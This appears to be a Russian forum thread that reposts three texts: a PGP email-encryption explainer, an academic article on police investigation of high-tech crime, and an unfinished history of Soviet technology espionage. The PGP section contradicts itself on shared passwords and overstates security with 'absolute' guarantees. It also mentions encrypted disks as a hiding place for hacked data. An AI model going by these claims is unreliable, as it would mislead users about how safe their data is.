Безусловно, зашифрованное письмо идет тем же путем, через те же цепочки серверов и все так же может быть закешировано. Однако, имея зашифрованный текст, абсолютно невозможно проанализировать его содержание. Другими словами, письмо становится бесполезным бинарным трафиком, который в итоге не интересен никому, кроме получателя. Получатель же имеет ключ, которым может расшифровать посланное именно ему сообщение. При этом отправитель и получатель знают один и тот же пароль, которым они шифруют сообщение. Созваниваться по телефону и придумывать пароль вместе при этом не надо :).

PGP базируется на так называемом асимметричном шифровании или, как его еще называют, на "шифровании с открытым ключом". На самом деле имеется два ключа: закрытый и открытый. Закрытый есть только у владельца, этот ключ совершенно секретен и не должен передаваться никаким лицам. Открытый ключ может публиковаться где угодно, должен использоваться отправителем при зашифровке сообщения, прочитать которое сможет только получатель, имеющий свой закрытый (секретный) ключ. Используемая технология асимметричного шифрования в данном случае имеет очевидное преимущество: ты легко можешь послать открытый ключ в открытой форме своему другу, и неважно, что этот ключ сохранится в кеше десятка серверов, так как он никак не поможет расшифровать соответственное зашифрованное сообщение. Кроме того, технология ассиметричного шифрования позволяет подписывать свои сообщения: твоим закрытым ключом генерируется цифровая подпись письма, при получении она сверяется и гарантирует то, что присланное письмо прислано именно от того, кем оно подписано, а его содержание никак не изменено.Таким образом, пользуясь PGP, будь абсолютно уверен, что, кроме тебя и получателя, о содержании вашей переписки никто не узнает, а также никто не сможет переписываться с вами от чужого имени. Звучит очень соблазнительно. Однако, прежде чем использовать мощь PGP в переписке с другом Васей, подумай, будет ли ваша переписка действительно интересной кому-либо в многомиллионном потоке других писем :). Стрелять из пушки по воробьям бессмысленно.

У PGP имеется свой сайт – www.pgp.com, где можно скачать последнюю версию PGP Desktop. Тебе будет выдан ключ с ограничением на 30 дней для ознакомления с функциональностью программы. В PGP Desktop имеется множество дополнительных возможностей кроме шифрования электронной почты: PGPdisk (создание зашифрованного виртуального диска, на котором можно хранить важную информацию), поддержка смарт-карт, аппаратных ключей (токенов), шифрование сообщений в ICQ, возможность невосстановимого стирания файлов, возможность создания зашифрованного архива с файлами, доступного для открытия только избранным персонам, и еще по мелочи.

Также существует проект GnuPG (GPG) - www.gnupp.org , который, базируясь на том же самом стандарте, что и PGP, разрабатывался специально под Linux. Однако теперь имеется и Win32-версия, но консольная - без интерфейса.

Мифы

На многих форумах интернета часто возникают вопросы о том, не является ли PGP "мягким и пушистым гремлином".

В PGP есть троян

Это неправда. Все версии PGP (кроме 7.0) имеют открытые исходные коды. При желании ты можешь самостоятельно скомпилировать рабочую версию PGP, заранее лично исследовав код на наличие в нем каких-либо троянов и прочих вирусов.

В PGP встроен backdoor для спецслужб

И это ложь, опять же потому что исходные коды доступны, алгоритмы шифрования не раз проверены пытливыми умами выдающихся математиков современности, а они моментально нашли бы такие способы беспарольной дешифровки. В старых версиях PGP действительно была найдена возможность быстрой расшифровки зашифрованных данных, но ошибка была моментально поправлена. И скорее, это был не backdoor для спецслужб, а банальная дырка в программе или алгоритме шифрования. Как известно, автор никогда не найдет всех дырок в своем творении самостоятельно :).

Версия... самая стойкая

Возможно, дело в том, что сейчас существуют коммерческие версии PGP, исходный код которых недоступен. Однако шестая и более ранние версии имели абсолютно полный исходный код, что дает широкие возможности для изучения алгоритма программы и нахождения дырок. А там, где имеется только машинный код, сложнее найти дырки, которые все равно рано или поздно найдут. К тому же не стоит забывать о том, что старая версия уже изучена вдоль и поперек, а новую, вышедшую совсем недавно, умельцы еще не успели протестировать на наличие дырок.При желании спецслужбы расшифруют PGP-сообщения

Все зависит от длины ключа, использованного при шифровании. Сейчас PGP Desktop по умолчанию использует алгоритм RSA с ключом 2048 бит, достаточного для того, чтобы не хватило и миллиона лет для перебора ключей на нескольких суперкомпьютерах. Однако если в RSA используется ключ до 384 бит, такие ключи ломаются и на обычных домашних компьютерах.

BestCrypt, DriveCrypt, StrongDisk... лучше, чем PGP

На самом деле это программы совершенно иного рода. Основной задачей PGP является шифрование электронной почты. А программы типа BestCrypt, DriveCrypt и StrongDisk предназначены для создания виртуальных зашифрованных дисков, на которых хакеры любят хранить нахаканную информацию. Вполне необходимое средство защиты, потому как сотрудники отдела "К" :) любят приходить в гости к особо буйным, а также не слишком аккуратным хакерам и искать что-нибудь интересное на их винчестерах.

Проанализировав информацию о PGP, можно констатировать, что это достойная современная криптографическая система, полезная для тех, кто имеет дело с конфиденциальной информацией. А также для тех, кому неприятно осознавать, что его информацию, может быть, и не столь важную в мировых масштабах, сможет просмотреть любопытный товарищ. А также для тех, кому важно получать почту, будучи абсолютно уверенными в подлинности авторства письма.

В PGP есть два ключа: открытый и закрытый. Первый ты отдаешь тем, с кем переписываешься, второй - хранишь в укромном месте.

Открытый ключ можешь безбоязненно вешать даже в интернете в свободном доступе: с ним твою переписку не взломать, так как у любого твоего оппонента также есть свой уникальный закрытый ключ.

В PGP не может быть backdoor'ов или вирусов, хотя бы потому что исходные коды доступны для публичного изучения.

Используй ключ 2048 бит (по умолчанию) – он гарантирует невозможность подбора ключа.

Автор:  Ангел [ 26-03, 16:17 ]
Заголовок сообщения: 

Особенности оперативно розыскной деятельности при расследовании преступлений в сфере высоких технологий

Маклаков Г.Ю., Севастопольский национальный технический университет,

Рыжков Э.В., Донецкий институт внутренних дел МВД Украины,

http://www.crime-research.org

Особенности оперативно розыскной деятельности
при расследовании преступлений в сфере высоких технологий
Развитие прогресса в науке и технике идет в направлении новых
информационных технологий. Чем больше компьютерные технологии
вовлекается в коммерческий оборот, тем больше возникает потребность
в их защите от противоправных действий. Возникли понятия
компьютерной преступности (киберпреступности), интрнетпреступности,
информационной наркомании. Предметом преступной деятельности стала
информация. Стремительно растет число преступлений в сфере
интеллектуальной собственности и высоких (информационных)
технологий. Перед правоохранительными органами Украины стала
неотложная задача: на высоком профессиональном уровне раскрывать
преступления в сфере высоких технологий.
Для формирования грамотной информационной политики
правоохранительными органами Украины, выполнения приказов
Министерства внутренних дел Украины № 429 от 31.05.01 «Про створення
у структурі ДСБЕЗ підрозділів по боротьбі з правопорушенням у сфері
інтелектуальної власності та високих технологій» и № 737 от 19.08.01
«Про затвердження Типового положення про підрозділи ДСБЕЗ по
боротьбі з правопорушенням у сфері інтелектуальної власності та
високих технологій» оперативно-розыскная деятельность по раскрытию
преступлений в сфере высоких технологий должна осуществляться с
учетом особой специфики этих преступлений [1].

Залог успешного осуществления оперативно-розыскных мероприятий
состоит, прежде всего, в том, что стратегию и тактику выявления и
раскрытия противоправных деяний необходимо строить на основе хороших
знаний специфики состава преступления. Другими словами сотрудники
правоохранительных органов должны обладать хорошими знаниями в
области компьютерных технологий, кибернетики, психологии,
психолингвистики. Понятно, что в настоящее время такой подход
реализовать довольно трудно ввиду слабой подготовки сотрудников МВД
в области современных информационных технологий. Радикально проблема
может быть решена путем существенной коррекции существующих планов и
программ подготовки юристов в высших учебных заведениях МВД.
Один из
подходов к подготовке сотрудников правоохранительных органов на
основе современных информационных технологий, представлен в
публикации Маклакова Г.Ю. и Рыжкова Э.В. [2, с.121-131].

В данной статье рассматриваются некоторые концептуальные положения
по осуществлению оперативно-розыскной деятельности при
предупреждении и раскрытии преступлений в сфере информационных
(высоких) технологий.

Учитывая неотложность решения задачи по стабилизации преступлений в
области информационных технологий оперативно-розыскная деятельность
в области высоких технологий в настоящее время, на наш взгляд,
должна базироваться на трех дополнительных специальных принципах:

• стратегия и тактика ОРД в области информационных технологий должно
строится на основе самого широкого использования современных
достижений в области данных технологий;

• на этапе разработки стратегии и тактики ОРД в области высоких
технологий гласно и негласно должны привлекаться
высококвалифицированные специалисты по информационным технологиям;
• необходимо существенно пересмотреть качественный состав субъектов
при установлении конфиденциального сотрудничества (при осуществлении
агентурной работы);

• арсенал оперативной техники необходимо пополнить современными
техническими приборами и устройствами (в т.ч. компьютерными
программами), разработанными и успешно применяемыми в
информационно-технологической сфере народнохозяйственного комплекса;


• личному составу специализированных оперативных подразделений
необходимо пройти соответствующую подготовку (переподготовку) по
применению такой техники.

Без использования самых современных технических средств
эффективность оперативно-розыскной деятельности в сфере высоких
технологий резко снизиться. Поэтому сотрудникам правоохранительных
органов необходимо получить представление об основных положениях
учебных дисциплин в области кибернетики и вычислительной техники.

В деятельности подразделений органов внутренних дел может
использоваться как универсальное, так и специальное программное
обеспечение.
Универсальные программы (информационно-поисковой
системы, редакторы, электронные таблицы и т.п.) общего назначения не
только повышают производительность труда и эффективность работы по
выявлению, раскрытию и расследованию преступлений, но и поднимают ее
на качественно новый уровень. Специализированные программы могут
быть ориентированы на непосредственное их применение при
осуществлении оперативно-розыскных мероприятий в направлении борьбы
с информационной (в т.ч. компьютерной) преступностью. Остановимся на
краткой характеристике таких программных средств.

В настоящее время существует программы, позволяющие:

- контролировать процесс попыток взлома компьютерной системы или
сети;

- определять индивидуальный почерк работы программиста и
идентификационных характеристики разработанных им программ;

- определять перечень электронных адресов и сайтов Интернет, с
которыми работал пользователь;

- негласно регистрировать перечень программ, с которыми работает
пользователь;
- определять путь, а в некоторых случаях и конкретный адрес,
исходящей угрозы для компьютерных систем;

- осуществлять негласный контроль над программистом, определяя
характер разрабатываемых продуктов;

- обнаружить латентную и закодированную информации в компьютерной
системе;

- проводить идентификацию компьютерных систем по следам применения
на различных материальных носителях информации;

- осуществлять исследование следов деятельности оператора в целях
его идентификации;

- осуществлять диагностику устройств и систем телекоммуникаций на
возможность осуществления несанкционированного доступа к ним;

- исследовать материальные носители с целью поиска заданной
информации;

- осуществлять исследование компьютерных технологий для установления
возможности решения конкретных преступных задач (крекинг, хакинг,
фрикинг и т.п.);
- исследовать программ для ЭВМ и базы данных для определения их
возможного предназначения для преступных действий (наличие
программных закладок, подпрограмм класса «троянский конь» и т.п.).

Это далеко не полный перечень возможностей существующего
программного обеспечения, которое с успехом может использоваться при
осуществлении ОРД. На конференции предполагается продемонстрировать
возможности некоторых программ. Привести более детальное описание
работы специализированного программного обеспечения в открытой
печати не представляется возможным.

Поисковые программные средства могут найти широкое применение в
оперативно-розыскной деятельности (непроцессуальная форма), в том
числе и до возбуждения уголовного дела. Факт обнаружения объектов
(программ закладок, программного обеспечения для изготовления
вирусов или для осуществления взлома компьютерных сетей и т.п.)
может послужить основанием для возбуждения дела и производства
расследования. В процессуальной форме поисковые программные средства
могут найти применение при проведении следственных действий, таких
как следственный осмотр (все его виды), выемка предметов, документов
и электронной почтовой корреспонденции, следственный эксперимент,
выполняемый с целью опытной проверки показаний.
В оперативно-розыскной деятельности в области расследования
компьютерных преступлений целесообразно применять криминологическое
прогнозирование индивидуального и преступного группового поведения.
Определенную информацию можно извлечь, анализируя сетевой трафик
локальных и региональных компьютерных сетей. Полезную информацию
могут дать и анализ платежей клиентов за телефонные услуги.
Прогнозирование может успешно осуществляться в основе первичных
материалов оперативного учета, так как его банки информации
создаются на основе прогноза вероятности преступного поведения
определенных криминогенных контингентов. Именно прошлое их поведение
(судимость, правонарушения, антиобщественные поступки, большие
успехи в области программирования), настоящее (поддержание
криминальных связей, паразитизм, склонность к антиобщественным
занятиям, склонность создавать программы «вандалы») дают основания
для прогностических выводов о вероятном противоправном поведении в
будущем. Принимаются во внимание социальные оценки, даваемы е лицу,
представляющему оперативный интерес, роль для него мнения
представителей криминогенной и преступной среды. Все это в
совокупности является элементами методики криминологического
прогнозирования, которое вплетается в оперативно-розыскные
мероприятия при реализации форм ОРД (поиске, профилактике,
разработке). Естественно, вопросы моделирования и прогнозирования
необходимо решать, используя современные технологии.
В ряде составов информационных преступлений мотивация поведения
преступника имеет особое значение. Преступные мотивы есть по сути
своей модификации обычных человеческих мотивов, но направленные на
цели, запрещенные законом или связанные с использованием
противоправных средств, являются основополагающими в исправлении и
перевоспитании правонарушителей, осуществляемом с помощью методов
оперативно-розыскной деятельности. Такое понимание мотивации
преступного поведения исключает представление об обреченности
человека на преступное поведение, о неисправимости преступников.
Поэтому для осуществления ОРД в области информационных технологий
определенный интерес представляют социологические и психологические
исследования молодежи, обучающейся компьютерным наукам. Для
профилактической деятельности по предотвращению компьютерных
преступлений важно проводить изучения мотивов поступков человека.
Особый интерес представляет определение уровня
ценностно-ориентационного единства в молодежной аудитории (ЦОЕ). По
ур овню ЦОЕ можно определить факторы, влияющие на поведение человека
в группах и, в какой-то степени, спрогнозировать его стремления к
противоправным действиям. Одним из авторов этой статьи, разработана
методика определения ЦОЕ, которую можно использовать при
прогнозировании компьютерной преступности в молодежной аудитории [3,
с.129-131].
При выявлении и раскрытии преступлений, совершенных с использованием
компьютеров, вычислительных систем или иной электронной техники,
оперативный сотрудник сталкивается с нетрадиционными следами
преступной деятельности или вещественными доказательствами. Поэтому
для грамотного использования фактических данных, полученных в ходе
осуществления оперативно-розыскных мероприятий по таким
преступлениям, базовой юридической подготовки может оказаться
недостаточно.

Для успешного осуществления ОРД сотрудникам необходимо хорошее
знание психологии хакера, знать его тактику проведения атак на
компьютерные системы, уровень его знаний и возможность их
пополнения. Кто как не преподаватели высших технических заведений,
обучающих студентов современным компьютерным технологиям могут
помочь сотрудникам спрогнозировать поведения преступных элементов,
подсказать возможные пути пресечения преступных действий.
Анализ учебных планов и программ по направлениям 0804 «Компьютерные
науки» и 0915 «Компьютерная инженерия» показал, что наиболее
углубленную подготовку по компьютерным наукам (в плане использования
как базовой подготовки специалистов по раскрытию преступлений в
сфере высоких технологий) получают студенты по специальности
7.091501 «Компьютерные системы и сети». Для ОРД в области
информационных технологий целесообразно привлекать преподавателей и
специалистов, обеспечивающий учебный процесс именно по этой
специальности. При подготовки резерва кадров для оперативных
подразделений имеет смысл привлекать молодых специалистов,
окончивших высшие учебные заведения по специальности «Компьютерные
системы и сети» для получения ими второго высшего (юридического)
образования либо прохождения курсов первоначальной подготовки в
системе МВД. Интересную информацию для правоохранительных органов
могут дать различные социологические и психологические исследования
(типа: «Что движет хакером», «Что Вас привлекает в Интернете» и
т.п.) в молодежной аудитории. Дело в том, что в настоящее время все
больше исследователей склоняются к тому, что хакер - это одно из
направлений молодежной культуры, как раньше рокеры, металлисты,
нудисты. Вопрос спорный, тем не менее, ряд социологических
исследований, проведенных в Севастопольском национальном техническом
университете, позволил выявить некоторые взгляды молодежи о хакерах.
Оказалось, что кто-то занимается хакерством из спортивного интереса,
кто-то ради самоутверждения, кто-то ради извлечения материальной
выгоды.
Такие исследования позволят углубить знания по тактике
проведения и философии (психологии) хакерских атак.

Хотелось бы еще остановиться на одном любопытном факте, который
необходимо, на наш взгляд, учитывать при расследовании преступлений
в сфере информационных технологий. Хорошо известно, что многие, так
сказать «традиционные» преступления совершаются в состоянии
алкогольного или наркотического опьянения. Существует достаточно
количество методических руководств, алгоритмов по проведению
операций, по предотвращению преступлений. Однако, мало кому
известно, что существует понятие «информационной наркомании»
("internet-addiction", "pathological internet use"). В сети Интернет
практически открыто предлагаются специально созданная музыка
(“psychedelic music”), компьютерные программы (“psychedelic
software”), способные вызвать у человека состояние наркотического
опьянения. Складывается парадоксальный факт. Если человек
распространяет наркотик традиционным путем, то против него може быть
возбуждено уголовное дело по соответствующей статье уголовного
кодекса, а аналогичное деяние совершаемое в Интернет по распростране
нию “информационных” наркотиков остается безнаказанным. Точнее, тоже
может быть возбуждено уголовное дело по соответствующим статьям
уголовного кодекса, но вся беда в том, что большинство сотрудников
правохранительных органов даже незнают о возможностях деструктивной
информации. А ряд сект (взять хотябы для примера “Белое Братство”)
умело пользуются возможностями современных информационных технологий
воздействовать на сознание и подсознание человека
Действительно, современные информационные технологии могут оказать
деструктивное воздействие на сознание и подсознание человека. Через
сеть Интернет распространяются специально созданная музыка
(“psychedelic music”), компьютерные программы (“psychedelic
software”), способные вызвать у человека состояние наркотического
опьянения. Проблема Интернет-наркомании стала реальностью.
Интернет-наркомания подобно хроническому алкоголизму или азартной
игре имеет разрушительные последствия на человека, его семью,
работу, учебу, а в некоторых случаях, провоцирует на преступления.
По мнению профессора Питсбургского университета Кимберли Янг
проблема Интернет-наркомании в США достигла эпидемических размеров,
причем число наркоманов («сетеголиков») продолжает расти. В
международную классификацию психических расстройств (Diagnostic and
Statistical Manual of Mental Disorders - Fourth Edition «DSM-IV»,
American Psychiatric Association, 1995) внесено заболевание
«кибернетические расстройства».

Собственно говоря, в сети Интернет имеется практически открытая
информация по изготовлению синтетических наркотиков, но это
отдельная тема для изложения. Можно только сослаться на исследования
Роганова С.А. специализирующегося на расследовании уголовных дел,
связанных с незаконным оборотом наркотиков, который прямо указывает,
что методы синтеза наркотиков часто берутся из Интернет [5, с.52].
Все выше изложенное еще раз почеркивает необходимость наладить
контакт правохранительным органам со специалистами в области
биологической кибернетики и инфорформацтонным технология. И вот
почему можно считать достаточно своевременным и актуальным приказ
Министерства внутренних дел Украины 737 от 19.08.01 «Про
затвердження Типового положення про підрозділи ДСБЕЗ по боротьбі з
правопорушенням у сфері інтелектуальної власності та високих
технологій». В приложении к которому («Типове положення про
підрозділи ДСБЕЗ по боротьбі з правопорушеннями у сфері
інтелектуальної власності та високих технологій») прямо указывается
на необходимость: «Здійснення взаємодії з навчальними та науковими
установами у питанні у справі підготовки та перепідготовки фахівців
по боротьбі з правопорушеннями у сфері інтелектуальної власності та
високих технологій» [6, с.2].

Сегодня Интернет представляет большую возможность для проведения
разведывательных мероприятий (операций). Судя по выполненному
авторами обзору сайтов Интернет, такая работа активно ведется рядом
зарубежных государств. Следует обратить внимание, что уже давно
существует такое понятие, как “компьютерная разведка”. В начале 90-х
годов аналитики спецслужб США обратили внимание на то, что большая
часть необходимой информации без особого труда может быть получена
через Интернет. Это позволило пересмотреть структуру финансирования
спецслужб в сторону значительного увеличения средств, выделяемых на
“компьютерную разведку”.Теперь подразделения по исследованию и
использованию Интернет появились в ЦРУ, ФБР, СИС, МОССАД и других
спецслужбах развитых государств. Сфера их деятельности — легальная
разведка в глобальной сети, организация каналов связи с агентурой,
сбор материалов по оперативно значимым ситуациям, проведение акций
“информационной войны”, изучение личностных характеристик политиков,
ученых, военных, а та кже важнейших секретоносителей в качестве
возможных кандидатов на вербовку или агентов влияния. Детальное
осуждение этого направления спецслужб выходит за рамки данной
публикации. Здесь лишь напопомним, что разведывательную функцию
работники оперативных подразделений ОВД вправе осуществлять в
соответствии с Законом Украины «Об оперативно-розыскной
деятельности».

Получение любой информации о преступной деятельности требует
определенных тактических усилий и организационных форм: действий
негласных сотрудников, оперативно-поисковых групп, оперативных
контактов с гражданами. И все же многие сведения о традиционных
преступлениях (кражи, вывоз похищенных материальных ценностей,
владение оружием), по сравнению со сведениями о преступлениях в
сфере высоких технологий, как бы лежат на поверхности: их можно
визуально фиксировать, видеть предметы. Преступления в области
информационных технологий довольно часто можно получить лишь
изучением отношений, то есть глубинных явлений, часто никак не
фиксируемых визуально и по материальным следам. В качестве примера
можно привести факт. Сведения о преступлениях в сфере электронных
торговли не принято афишировать коммерческими структурами. Часто они
предпочитают понести убыток, чем потерять свою репутацию.

Учитывая, что основным местом преступления является Интернет (или с
использованием Интернета), то процесс сбора оперативной информации
легко автоматизировать путем использования специальных программ,
называемых интеллектуальными агентами (в среде программистов еще
называемы «пауками»). Они способны проводить анализ сайтов,
проводить целевой поиск информации в Интернет и тем самым находить
потенциальных преступников.

По результатам оперативно-аналитического поиска в оперативных
подразделениях целесообразно формировать компьютерные базы данных,
используемые:

• для последующей оперативной проверки преступных групп и
организаций; для проведения оперативно-профилактических мер;
• для внедрения оперативных работников и негласных сотрудников в
среду компьютерной преступности с целью углубления оперативных
позиций, необходимых для успешного продолжения стратегической
разведки.

Оперативно-аналитический поиск дает возможность для раскрытия
преступлений в сфере высоких технологий использовать компьютерное
моделирование. Одним из перспективных направлений компьютерной
инженерии является использование имитационных моделей. Такая модель
предусматривает организацию информационных потоков внутри
моделируемых систем, воспроизведение на компьютере операций обмена,
перераспределения, взаимодействия между отдельными структурными
элементами системы и поэтому является достаточно эффективным
средством изучения и прогнозирования компьютерной преступности.

Повышение эффективности работы правоохранительных органов по
раскрытию и расследованию преступлений в сфере высоких технологий в
настоящее время невозможно без интеграции в криминалистику новых
информационных технологий.
1. Приказ Министерства внутренних дел Украины № 429 от 31.05.01 «Про
створення у структурі ДСБЕЗ підрозділів по боротьбі з
правопорушенням у сфері інтелектуальної власності та високих
технологій»; Приказ Министерства внутренних дел Украины № 737 от
19.08.01 «Про затвердження Типового положення про підрозділи ДСБЕЗ
по боротьбі з правопорушенням у сфері інтелектуальної власності та
високих технологій».
2. Маклаков Г.Ю., Рыжков Е.В. Методологічні підходи, до
вдосконалення підготовки кадрів з ОВС з урахуванням розвитку
інформаційних технологій // Проблеми правознавства та правоохоронної
діяльності. Зб.наук.ст. №2, 2001. - Донецк: ДІВС, 2001. С.121-133.
3. Маклаков Г.Ю. Анализ сплоченности студенческой группы в работе
куратора. // Сб. “Структурно-системный подход в обучении и
воспитании”. ДГУ, Днепропетровск, 1984, с. 129-131.
4. Рыжков Э.В. Энергоинформационная безопасность общества и
государства с позиции деятельности правоохранительных органов //
Злочини проти особистої волі людини: Збірник матеріалів міжнародного
науково-практичного семінару (Харків, 19-20 вересня 2000 р.)
/[Редкол.: В.В. Сташис (голов. ред.) та ін.]. – Харків: “Книжкове
видавництво” Лествиця Марії”, 2002. – С. 83 – 88.
5. Роганов С.А. Синтетические наркотики: вопросы расследования
преступлений. - Спб: Пи-тер, 2001. – 224 с.
6. Приказ Министерства внутренних дел Украины № 737 от 19.08.01 «Про
затвердження Типового положення про підрозділи ДСБЕЗ по боротьбі з
правопорушенням у сфері інтелектуальної власності та високих
технологій».
Modified_for_Debian_by_R_N_C_E
http://cool12.boom.ru/HSC-23-35-11.HTM


Автор:  СПЕЦНАЗ ЛАСКИ [ 30-03, 05:30 ]
Заголовок сообщения: 

Борьба за высокие технологии

http://shpion.h1.ru/war_34.htm


Одной из главных задач секретных служб стран организации Варшавского Договора в начале 70-х гг. была охота за западными высокими технологиями, особенно в сфере компьютерной индустрии. В СССР понимали, что преобладание Варшавского блока в количестве обычных вооружений не может компенсировать технологическое отставание от Запада. Хотя выяснение политических и военных намерений противника всегда было и остается важнейшей целью разведок, в эпоху, когда неизмеримо возрастает роль все более сложных вооружений, приоритетные интересы агентурной деятельности лежат в области электроники, тонкой механики, оптической, нефтехимической промышленности и ядерной энергии, достижения которых в значительной мере используются в военной сфере. В СССР существовала военнопромышленная комиссия, которая была подчинена Совету Министров, а через него Политбюро ЦК КПСС. В руках комиссии находилось управление всей широкомасштабной снабженческой деятельностью в области новейших технологий. К добыванию технологической информации, наряду с КГБ и военной секретной службой ГРУ, были подключены и такие внешне выглядевшие как независимые учреждения, как Государственный комитет по науке и технике, Министерство торговли, Академия наук. Военно-промышленная комиссия, как координирующая инстанция, знакомилась со всеми поступающими материалами и распределяла их между соответствующими заинтересованными учреждениями. Это - девять министерств, отвечающих за вооружения, а также министерства химической промышленности, электроники и нефтехимии. Обычно промышленные шпионы получали целевые задания. К примеру, министерства вооружений, создающие новые ракеты или танки, как бы делали "заявки" в координирующую инстанцию, которая далее решала, кому поручить исполнение заявки, должны ли быть подключены к сбору интересующих данных секретные службы КГБ и ГРУ, или Министерству иностранных дел, Государственному комитету по науке и технике, Государственному комитету по внешнеэкономическим связям будет достаточно открытых источников для получения нужной информации, Списки заказов составлялись точно по каталогам, сопровождались кодовыми номерами, а возможно, и внутрифирменной нумерацией документов. Существовали даже взаимные договоренности между спецслужбами стран Восточного блока. Если, например, ГДР интересовал определенный проект и она намеревалась поручить соответствующее задание своему агенту, то ее Главное управление разведки (ГУР) должно было предварительно выяснить в КГБ, не находится ли данный объект уже "в работе". После согласования потребностей определялся поставщик или сотрудник, который должен был это задание выполнить. Им мог быть агент или просто независимый мелкий предприниматель, готовый преступить экспортные ограничения. Шпионы соцстран систематически занимались сбором информации "о новейшем состоянии ЭВМ и развитии компьютерной техники", изучая специальную западную литературу или же участвуя в соответствующих конференциях и ярмарках-выставках. По оценкам ЦРУ, в сети охотников за западными технологиями или в их закупках было задествовано до 20 тыс. восточноевропейских шпионов. В 1972 г. в составе КГБ было создано Управление "Т", подчиненное Первому главному управлению внешней разведки), в котором было занято около 1800 высококвалифицированных специалистов - ученых и инженеров всех отраслевых направлений. Управление "Т" располагало многими сотнями сотрудников за рубежом, которые, действуя конспиративно, поддерживали связь с западными специалистами в области международного технологического обмена. В итоге Советский Союз по дешевке получил стратегически-технические ноу-хау, в которые Запад за предыдущие десять лет вложил более 100 млрд долларов. Согласно сведениям ЦРУ об утечках технологий от декабря 1986 г. Восточным блоком ежегодно выделялось более 2,5 млрд долларов на приобретение документов и оборудования из западных конструкторских бюро. По оценке западных спецслужб, в период между 1976 и 1986 г. на Восток через подставные фирмы ушло около 900 тыс. технологических документов и более 75 тыс. образцов и деталей иностранных конструкторских разработок, совокупная ценность которых в десять раз превышала затраченные на их приобретение суммы. Согласно сведениям ЦРУ, в контрабанде особенно широко использовалась в качестве международного "шлюза" технологий территория Федеративной Республики Германии, По данным западных спецслужб, около 60 процентов раскрытых случаев запрещенной передачи технологий из Западной Европы в страны Восточного блока (причем грузы были снабжены поддельными фрахтовыми документами и накладными) приходилось на долю закупщиков и агентов ГДР. Советской космонавтике, в частности, удалось сэкономить миллионы рублей на разработке космического скафандра, нелегально получив американскую модель всего за 180 тыс. долларов. А система наведения ракет средней дальности "СС-20", согласно информации ЦРУ, была сконструирована в СССР с помощью счетно-решающих устройств Ай-би-эм, поставленных в Москву дочерним немецким предприятием концерна Ай-би-эм. Это "страшное оружие", как заявил советник Пентагона Кострик, напичкано западной технологией. Как констатировал один из сенатских комитетов США еще в 1980 г., нелегальный экспорт высоких технологий принял такие масштабы, что превосходство Запада сократилось в некоторых областях военной техники с десяти до двух лет и менее.
Эксперты Пентагона считают, что большинство важных советских систем вооружения базируется на западных высоких технологиях. Считают даже, что доля нелегально переброшенных с Запада технологий составляет в военных новинках армий Варшавского Договора около 70 процентов. Это позволило СССР развивать оборонительные системы против нового западного оружия с опережением, задолго до того как оно принималось на вооружение в армиях потенциального противника. Так, советские разработчики имели чертежи американского транспортного самолета "С-5А" Гэлакси еще до при^ мснения этой машины в Соединенных Штатах, а советские межконтинентальные ракеты были сконструированы с использованием узлов из США. Точно так же обстояло дело с радарной системой НАТО "АВАКС". Вот еще несколько примеров. В 1983г. на американском Атлантическом побережье был найден выброшенный волнами советский шпионский буй, тип подводного подслушивающего устройства, которое должно было обнаруживать атомные подводные лодки США. В его конструкции имелись высококачественные американские микроэлектронные детали, в том числе микрочипы серии 5400, производимые фирмой "Тексис инструменте инк." для ВМС США.
Американский техник Уолтер Споур нелегально продал Советскому Союзу через немецкого посредника сконструированное им сверхсовременное лазерное зеркало с водяным охлаждением. Эти зеркала становятся важнейшей деталью прототипов советских спутниковубийц, Другой американский умелец поставлял Советскому Союзу приемные устройства, используемые в самой новейшей навигационной системе ВМС США "Омега", благодаря которым советские подводные лодки сегодня в считанные секунды точно определяют свое местонахождение в Мировом океане. В 1949 г. был создан международный Координационный комитет по экспортному контролю (КОКОМ) со штаб-квартирой в Париже. В него вошли США, страны НАТО, кроме Испании и Исландии, а также Япония. КОКОМ призван быть контрольной инстанцией стран Запада по всем вопросам легального и нелегального обмена технологиями. Главной его задачей является предотвращение экспорта военных устройств в страны Восточного блока, В секретных, обязательных для всех стран - членов КОКОМ списках эмбарго перечислены все существенные в военном отношении технологии, и эти списки обновляются с учетом стремительного развития компьютерной техники. В таких же списках-соглашениях определена совместная стратегия поддержания эмбарго. Заседания КОКОМ абсолютно секретны, и французское правительство ничего о них не сообщает. Но поскольку отсутствует юридическая база для обеспечения решений этой комиссии, национальные власти обычно рассматривают нарушение правил КОКОМ как малозначащие неджентльменские деликты (проступки). Вследствие этого эмбарго произвольно нарушаются во всех государствах - участниках КОКОМ. К числу изощреннейших контрабандистов последних достижений западной технологии можно отнести дортмундского инженера Вернера Юргена Бруххаузена. Он стоял в центре разветвленной агентурной сети, с помощью которой в течение ряда лет в страны Восточного блока в ущерб западной безопасности переправлялись стратегические компьютеры. По заявлению американских властей, Бруххаузен замешан в широкомасштабных контрабандных подпитках Советского Союза в сфере высоких технологий. Так, на международной выставке "Электроника - 1974" в Мюнхене, где у инженера по средствам связи и высокочастотной технике Бруххаузена имелся собственный стенд, с ним заговорили два советских гражданина. Их интересовали детали, которые в то время еще не производились промышленностью государств Восточного блока. Подобные выставки-ярмарки, на которых западные фирмы демонстрируют новейшие высокотехнологичные изделия, - едва ли не самое идеальное место для старта контрабандных операций. Бруххаузен согласился на сделку и сразу же после первых контактов в Москве в октябре 1974 г. основывает четыре фирмы в Лос-Анджелесе. За два года он создал еще несколько подставных фирм, ориентированных исключительно на выполнение восточных заказов. Так начиналась перекачка западной технологии из солнечной Калифорнии. Предприятия Бруххаузена, расположенные вокруг Лос-Анджелеса, - это десятки переплетающихся фирм. Их реквизиты постоянно менялись, некоторые существовали только на бумаге. Главное представительство, которое сам его глава называл "Континентл текнолоджи корпорейшн" (КТК), имело 18 различных адресов и наименований. Некоторые филиалы фирмы в полном смысле слова состояли из одного письменного стола. В качестве партнера Бруххаузена в Калифорнии выступал Анатолий (Тони) Малута, уроженец Харькова, сотрудник секретной службы ВВС США. Бруххаузен нанял его по объявлению. Согласно визитной карточке Малута являлся вице-президентом КТК. Он заправлял делами в Лос-Анджелесе, а помогала ему в этом его немецкая приятельница Сабина Титтель. Эта пара составляла первое звено сложной цепи, позволявшей обходить статьи эмбарго и поставлять микроэлектронику в Москву. Из опасений быть раскрытыми Малута и Бруххаузен общались между собой при помощи сложно зашифрованной тайнописи. Схема поставок работала без сбоев, каналы пересылки постоянно варьировались. Предназначенный для незаконного вывоза товар заказывался у одной из многочисленных фирм Бруххаузена, оплачивался, как правило, наличными и затем направлялся по сложному маршруту через третьи, четвертые, а то и пятые страны адресатам в странах Восточного блока. Излюбленные страны транзита - нейтральная Швейцария и Южная Африка с ее чрезвычайно 